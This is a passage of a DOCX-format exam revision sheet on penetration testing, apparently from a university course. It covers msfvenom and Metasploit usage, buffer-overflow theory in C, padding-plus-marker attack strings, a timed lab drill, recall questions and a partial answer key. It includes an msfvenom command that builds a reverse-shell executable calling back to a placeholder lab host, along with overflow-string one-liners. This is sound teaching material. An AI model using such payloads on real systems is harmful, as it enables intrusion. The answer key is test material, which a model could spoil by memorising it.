      </w:pPr>
      <w:r>
        <w:t>Msfvenom — recognise the syntax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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>msfvenom -l payloads</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>msfvenom -p &lt;PAYLOAD_NAME&gt; --list-options</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>msfvenom -p linux/x64/shell_reverse_tcp LHOST=&lt;KALI_LAB_IP&gt; LPORT=4444 -f elf -o lab_payload.elf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>Memorise: -p = payload; LHOST/LPORT = reverse callback destination; -f = output format; -o = output filename. This generates a lab executable; do not run or distribute it outside an explicitly authorised isolated environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>When the tool fails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FFF6E4"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FAST TROUBLESHOOTING</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No module? Search service / version / CVE again. Exploit fails? Confirm product, platform, port and prerequisites. No session? Check RHOSTS, LHOST, network/firewall and payload compatibility. A port being open does not prove vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>6  BUFFER OVERFLOWS: THEORY &amp; C CODE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Memorise the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7"/>
        <w:gridCol w:w="7022"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Short exam answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Buffer overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Writing beyond a buffer’s allocated bounds, potentially corrupting adjacent memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Buffer overread</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Reading past allocated bounds, potentially exposing unrelated memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Integer overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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 calculation exceeds integer type range; may lead to wrong sizes or unsafe bounds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Memory for call frames, local automatic variables and return information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Heap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Dynamically allocated memory, e.g. obtained through malloc().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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ASLR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Randomises memory layout to make addresses less predictable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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NX / DEP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Marks memory non-executable to make code injection harder.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Stack canary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Detects certain stack corruptions before function return.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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PIE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="70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Allows executable code addresses to be randomised with ASLR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exam example A: stack overflow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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>void risky(const char *input) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    char name[8];            // local array: stack</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    strcpy(name, input);    // vulnerable write</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable buffer = name. Vulnerable line = strcpy(name, input).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>strcpy does not know the destination size. An 8-byte destination holds at most 7 normal text characters plus the terminating NUL byte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Stack allocation of name is separate from whether the input originates from a file, network or command line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exam example B: heap overflow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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>void risky_heap(const char *input) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    char *name = malloc(8);  // allocated 8 bytes: heap</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    strcpy(name, input);    // vulnerable write into heap</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    free(name);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>The pointed-to 8-byte buffer is on the HEAP; the local pointer variable name itself is typically on the STACK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Writing too much may corrupt adjacent heap data. malloc does not automatically enforce string bounds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Safer pattern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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>char name[8];</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>snprintf(name, sizeof name, "%s", input);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EAF2F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DEFENCES TO NAME IN SHORT ANSWERS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bounded input/copy operations and explicit lengths, input validation, safer languages/libraries, compiler stack protection, ASLR, NX/DEP and PIE. Mitigations reduce risk, but no single measure replaces bounds checking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>7  BUFFER OVERFLOW: ATTACK-STRING REASONING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>For the exam, separate the length calculation from the platform-specific exploitation details. A buffer size does NOT automatically tell you the offset to a return address; compiler layout, padding and protections matter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Understand the 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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>[padding to reach the chosen overwrite location] + [replacement bytes]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Padding is a sequence such as AAAAAA used to reach the overwrite position.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Offset = how many bytes from the start of input to the field you want to overwrite; establish this from lab measurements or a supplied diagram.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>On little-endian x86, an address such as 0x41424344 is stored as 44 43 42 41 in memory. Only apply endian conversion when an address value is part of the question.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>NUL terminators, bad characters, newline handling and protections can change what input reaches the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Safe practice: demonstrate the offset using a harmless marker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Example: if a question explicitly supplies a 20-byte overwrite offset and asks for a 4-byte marker BBBB, the conceptual answer is 20 “A” bytes followed by BBBB (24 bytes total). This illustrates offset construction, not a usable hijack address.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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>python3 -c 'import sys; sys.stdout.buffer.write(b"A"*20 + b"BBBB")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>If the question gives a 32-bit value instead, pack its bytes in the required order. For a toy value 0x41424344 on little-endian x86, the four bytes are 44 43 42 41 (ASCII DCBA).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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>python3 -c 'import sys; sys.stdout.buffer.write(b"A"*20 + (0x41424344).to_bytes(4, "little"))'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>What to look for when given a new C snippet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90"/>
        <w:gridCol w:w="6830"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Question you ask</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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1. Allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="683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How large is the destination? Stack array? malloc heap?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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2. Input source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="683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Where do attacker-controlled bytes enter?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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3. Write operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="683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strcpy, gets, sprintf, memcpy, indexing, loop bounds?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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4. Maximum length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="683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Does the code prove input fits, including NUL terminator?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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5. Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="683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Overflow, overread or integer size bug?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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6. Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="683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What specific change prevents out-of-bounds access?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Practise classifying these in 10 seconds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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>char a[10]; gets(a);                 // stack; unbounded input</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>char *b = malloc(10); strcpy(b,s);  // heap buffer; unbounded copy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>int x = INT_MAX; x = x + 1;        // signed integer overflow (undefined in C)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FFF6E4"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>EXAM TIP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>If asked for the vulnerable line AND buffer, give both. For example: “Vulnerable line: strcpy(b, s); vulnerable buffer: heap allocation pointed to by b.” This is more precise than merely writing “strcpy is unsafe”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>8  MOCK BLACK-BOX PRACTICAL DRILL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Practise on a local, deliberately vulnerable VM or an instructor-provided target. Use the timed drill below without notes, then compare your steps with the answer key on the following page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10 minutes — setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Confirm Kali can access the lab VM network; identify the right interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Determine your own Kali IP and subnet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Identify the target IP without logging into the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>30 minutes — scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ List live hosts on the authorised subnet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Run an initial TCP scan and an all-TCP-port scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Discover versions on relevant open ports; try OS fingerprinting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Identify at least one credible vulnerability candidate with evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>30 minutes — exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Launch msfconsole; search for a relevant module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Explain exploit vs payload; select the correct module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Set RHOSTS/RPORT and compatible PAYLOAD; LHOST/LPORT if needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Check where supported, run, and interpret whether it succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>30 minutes — buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Define overflow vs overread vs integer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Identify stack or heap for example C buffers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Point to vulnerable line and buffer; explain a mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>□ Construct a padding-plus-marker string using a supplied offset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Rapid recall: answer aloud without looking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>1. What is the difference between -sn and -Pn?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>2. What single flag scans all TCP ports?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>3. Which flag discovers service version? Which detects OS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>4. What does filtered mean in an Nmap result?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>5. Which command shows Kali IP interfaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>6. What is the difference between a port and a vulnerability scan?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>7. Which Metasploit command finds matching modules?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>8. What is the difference between exploit and payload?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>9. What is RHOSTS vs LHOST?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>10. How do you see compatible payloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>11. What does check do? Does every module support it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>12. What is msfvenom -p? -f? -o?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>13. What memory area is malloc associated with?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>14. What is the risk in strcpy(buffer, input)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>15. Why can 8 visible characters overflow char buffer[8] when using strcpy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>16. What is ASLR vs NX vs a stack canary?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>17. How many bytes are in A×20 + BBBB?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t>18. In a sequential exam, when must you answer a question?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>9  RAPID-RECALL ANSWER KEY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3"/>
        <w:gridCol w:w="8946"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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4845"/>
            <w:shd w:fill="183F6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Model answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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-sn = host discovery only; -Pn = skip host discovery and scan target as if up.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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-p- (for a TCP scan, this covers TCP ports 1–65535).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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-sV = service/version; -O = OS estimate. -A also includes both, plus default scripts and traceroute.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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Nmap cannot determine the state because a filter/firewall or lack of reply interferes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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ip -br a  (ip addr also works).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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Port scan maps reachable services; vulnerability scan checks for potential weaknesses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="89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search &lt;keyword&gt; or search type:exploit &lt;keyword&gt;.</w:t>
            </w:r>
          </w:p>
        </w:tc>
